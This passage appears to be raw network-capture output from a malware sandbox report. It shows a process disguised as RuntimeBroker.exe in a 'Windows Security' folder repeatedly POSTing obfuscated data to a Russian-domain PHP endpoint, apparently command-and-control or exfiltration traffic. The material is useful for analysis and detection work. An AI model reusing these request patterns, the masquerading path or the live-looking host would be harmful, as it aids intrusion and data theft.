                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2eb98Gi6yQLR1mQN%2Fbn3iQvTRL1LhGXlJWIjM25N9rRIRIC1BTdSN2mN5iEFW7ISw7O2avTwig83Rp7HIJ3pbAdsQcjWZhpITT85Z3AaT2hCsA63PHeaJhX3eoUoHi3XrMcl1Gpb"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf640b4ec743c4-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3579&min_rtt=1663&rtt_var=4456&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=85917&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          112192.168.2.450055104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:28.333651066 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:28.678112984 CET1056OUTData Raw: 50 54 58 53 5f 59 51 58 55 5a 54 59 51 5d 55 54 58 58 5c 5b 59 57 52 5f 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: PTXS_YQXUZTYQ]UTXX\[YWR_][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ X(%[#+X$=%[*- '42P.43%3,?8. (=(*#^!'^)?
                                                                                                                          Jan 1, 2025 04:23:28.778016090 CET25INHTTP/1.1 100 Continue


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          113192.168.2.450059104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:28.965281963 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1780
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:29.321029902 CET1780OUTData Raw: 55 50 58 50 5f 5e 51 5e 55 5a 54 59 51 5e 55 55 58 52 5c 5c 59 5d 52 5e 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UPXP_^Q^UZTYQ^UUXR\\Y]R^][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ \+Y-X ("%.5)#^'$:W.43?*'(,>(?>3)#^!'^)3
                                                                                                                          Jan 1, 2025 04:23:29.409382105 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:29.723485947 CET968INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:29 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=My%2BeH8%2BG1wW1QOUs%2B%2BRhRizpqH%2FaJqpSqMFMyBCFLOvxdaTfy%2FBvkCe50FEvsJo8pf93Q3pPfMmQJ1xeTSxWXj7qU51vJhL%2FD3rrNNExE2btd4z%2F%2FOuG1pHa9p8B8JV6Re%2F5r9Kl"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf64148fbf43b5-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2248&min_rtt=1802&rtt_var=1567&sent=5&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2124&delivery_rate=271880&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 39 38 0d 0a 03 1e 22 50 33 3b 33 5f 3c 2d 36 58 38 3f 01 56 25 3c 2a 14 33 30 05 07 25 00 21 59 3a 28 30 11 2b 28 2b 58 31 2a 2d 13 21 31 3d 01 26 36 2e 5d 04 1d 25 10 3f 29 35 04 3c 01 2e 06 29 0c 01 06 27 34 38 01 24 34 0e 5d 33 3d 0c 5a 22 0c 20 0a 24 0d 0e 1c 3c 00 20 01 30 03 00 1f 21 2a 2e 57 0d 12 21 0f 25 00 18 0d 2a 08 28 53 36 5a 27 54 27 01 2c 0c 27 5a 20 1d 23 2b 22 56 29 2f 28 11 23 24 3a 09 27 04 0e 01 36 07 2e 05 21 33 22 54 20 03 2f 54 05 3d 56 4f 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 98"P3;3_<-6X8?V%<*30%!Y:(0+(+X1*-!1=&6.]%?)5<.)'48$4]3=Z" $< 0!*.W!%*(S6Z'T','Z #+"V)/(#$:'6.!3"T /T=VO0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          114192.168.2.450062104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:29.130665064 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:29.474906921 CET1056OUTData Raw: 55 54 5d 54 5a 58 51 55 55 5a 54 59 51 58 55 53 58 5e 5c 58 59 5c 52 5c 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UT]TZXQUUZTYQXUSX^\XY\R\][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ ^+?* (:2=)>X73'"V.4$$>V3,0/.<8)#^!'^)+
                                                                                                                          Jan 1, 2025 04:23:29.574389935 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:29.921484947 CET818INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:29 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BTLFTZjnvg%2FQi6aHswrIJim%2BJ5DsA%2F9r2r1sv5U5n1SwtatdKxgOCnFmZlzKs%2BqHOZjYkoYBPU6Tf2kRv3Pyeb3%2F8eYj9%2BpiKoS9StD%2BupR5iiksDDu7frne08L%2BL2YhUlZ7X%2Fxt"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf64159f16f78f-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4088&min_rtt=1490&rtt_var=5755&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=65535&cwnd=136&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0
                                                                                                                          Jan 1, 2025 04:23:29.959769964 CET818INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:29 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BTLFTZjnvg%2FQi6aHswrIJim%2BJ5DsA%2F9r2r1sv5U5n1SwtatdKxgOCnFmZlzKs%2BqHOZjYkoYBPU6Tf2kRv3Pyeb3%2F8eYj9%2BpiKoS9StD%2BupR5iiksDDu7frne08L%2BL2YhUlZ7X%2Fxt"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf64159f16f78f-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4088&min_rtt=1490&rtt_var=5755&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=65535&cwnd=136&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          115192.168.2.450068104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:30.052881956 CET320OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Jan 1, 2025 04:23:30.396790981 CET1056OUTData Raw: 50 51 58 54 5a 5d 54 59 55 5a 54 59 51 5e 55 57 58 53 5c 54 59 51 52 58 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: PQXTZ]TYUZTYQ^UWXS\TYQRX][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ#+>#;!X1>2*+$$U,4(]'Q$<'-= _?>T=<#^!'^)3
                                                                                                                          Jan 1, 2025 04:23:30.504983902 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:30.680083990 CET812INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:30 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jEE69aHWyjNA2Yk4Uc%2FWwt6malDxaUyFJuaSYRxZe2xLuAVK1mUXpn%2FYw4AzWac4R%2B7sdTheeApkCt02RPf%2BJ45sQ%2FH0z3hWttN5jZfGhOjzsrPHPFDR1PV5B4IutgxFCwZ%2BCn9%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf641b6fd0c40c-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3217&min_rtt=1490&rtt_var=4013&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1376&delivery_rate=95368&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          116192.168.2.450074104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:30.803767920 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:31.162478924 CET1056OUTData Raw: 55 56 58 5d 5a 5a 51 5f 55 5a 54 59 51 59 55 5d 58 59 5c 58 59 52 52 5c 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UVX]ZZQ_UZTYQYU]XY\XYRR\][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ (Y1X!;:%1[)7Y34*U,'(0,*$$8 \?.(W=,#^!'^)/
                                                                                                                          Jan 1, 2025 04:23:31.277174950 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:31.547723055 CET809INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:31 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=49OeWEdVX9kNJZtdw4xakERtMP%2FDT18mbxjRQiJ0mC78TANf84ESf40b0%2B4cTZUDEMOs%2Fua0sgKQ4lB%2BQR50I%2FVGXA47C8WpAScc6B1xkJZtRRKp4FTV5yyRVUdY28d26cTOQJnC"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf64202dfe0ca6-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2952&min_rtt=1557&rtt_var=3374&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=114779&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          117192.168.2.450079104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:31.679172993 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:32.037556887 CET1056OUTData Raw: 55 55 5d 53 5a 5d 54 5f 55 5a 54 59 51 5d 55 52 58 58 5c 5c 59 51 52 58 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UU]SZ]T_UZTYQ]URXX\\YQRX][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ _+/!892))/0'"Q94Y$*V'/;_,>Z<.8>#^!'^)?
                                                                                                                          Jan 1, 2025 04:23:32.131272078 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:32.308424950 CET807INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:32 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s84MwA8KX%2F9pJN0tyCmTPq%2FKBBNK33Mkt8moRwk6rsyK0Wu8uxmUx4DrJpqcx%2Bk5ub95LzdG1hK8cFBEkGF8QClLiNdZlrf9B5HAxQSZ%2FbOcsWabQj3wyvSLaQoFKoApo8F2dM4w"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf64258cba424f-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3285&min_rtt=1715&rtt_var=3784&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=102255&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          118192.168.2.450085104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:32.428725958 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:32.787457943 CET1056OUTData Raw: 50 55 58 53 5f 59 54 59 55 5a 54 59 51 53 55 57 58 58 5c 5e 59 55 52 53 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: PUXS_YTYUZTYQSUWXX\^YURS][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ X(?!8%2>=)?$'&W,$''!0/$[?(<#^!'^)
                                                                                                                          Jan 1, 2025 04:23:32.877871990 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:33.150619030 CET803INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:33 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vJdr4WqWGpQfZYVIItt8Sxsdu4pgXXdBwsQcqgAkEPOY3I6aG9kOEJ1JPC1txN7zbRKUiu0LT6vCKhTxfsEBtB%2BK4DPY%2FWws1X6akGTRQxggG3uE79RTbmwcJF34s6crqpjloG6x"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf642a3b5c8cc6-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2313&min_rtt=2038&rtt_var=1314&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=344502&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          119192.168.2.450091104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:33.275537014 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:33.631248951 CET1056OUTData Raw: 50 55 5d 53 5a 5a 54 59 55 5a 54 59 51 5a 55 57 58 5d 5c 59 59 51 52 53 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: PU]SZZTYUZTYQZUWX]\YYQRS][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ#+Y1Z41Y%X=[>> 3$>-$323//Y,><?(,#^!'^)#
                                                                                                                          Jan 1, 2025 04:23:33.742856979 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:34.021209002 CET803INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:33 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W6hs19E8iL%2BPaAFzSV4RXHKRbXBoXlTDiLV00ziFxxjOMqqA1HhXtNcthJbKakneaf97LYQiLvulVATl4yB7H359BBEq8N6I4Vr%2FnD3vUdiKqJJUH0OaTLC7IbvLEbhPudZdXbEE"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf642f994b7ca2-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=7576&min_rtt=2127&rtt_var=11696&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=31933&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          120192.168.2.450098104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:34.146653891 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1048
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:34.490541935 CET1048OUTData Raw: 50 51 5d 51 5f 5d 51 55 55 5a 54 59 51 5b 55 53 58 5b 5c 5d 59 5c 52 53 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: PQ]Q_]QUUZTYQ[USX[\]Y\RS][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ#</]#+%&.2=<3'.:$^3?6''[/\<=<)#^!'^)?
                                                                                                                          Jan 1, 2025 04:23:34.677716017 CET25INHTTP/1.1 100 Continue


